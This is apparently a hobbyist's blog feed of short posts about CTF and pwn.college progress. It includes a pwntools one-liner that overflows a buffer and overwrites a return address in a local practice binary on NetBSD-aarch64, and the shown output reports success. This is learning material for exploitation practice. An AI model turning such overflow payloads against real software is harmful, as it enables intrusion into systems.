hubertf's NetBSD blog

This afternoon's fun: pwning NetBSD-aarch64 (ARM)

(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm

#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb #ctf

Fun with AI generating images for Over The Wire`s starter wargame for Binary Exploitation

https://overthewire.org/wargames/narnia/

#ctf #cybersecurity #OverTheWire #Narnia #BinaryExploitation #Pwn

pwn.college's Binary Exploitation module: ✅ - took less than two days in total (with a few days off in between). Now off to the remainders of the Orange belt, especially the challenge that was added to the Crypto module after I've finished that.

#ctf #cybersecurity #pwncollege #binaryexploitation #pwn

All the other modules for the Orange Belt are done, and now to the part that really got me into pwn.college: It's pwn time! 🙂

#ctf #cybersecurity #pwncollege #pwn #binaryexploitation

Baby steps, giant steps... slowly working towards my Orange belt in pwn.college. Finally completed Web Security with XSS & CSRF today, and now I only have the most interesting modules left: Reverse Engineering and Binary Exploitation (plus the combined exercise after that).

#ctf #cybersecurity #websecurity #xss #csrf #reverseengineering #binaryexploitation #pwn #pwncollege

BCACTF 2022 Pwn Writeups - The Hard Ones · Karmanyaah Malhotra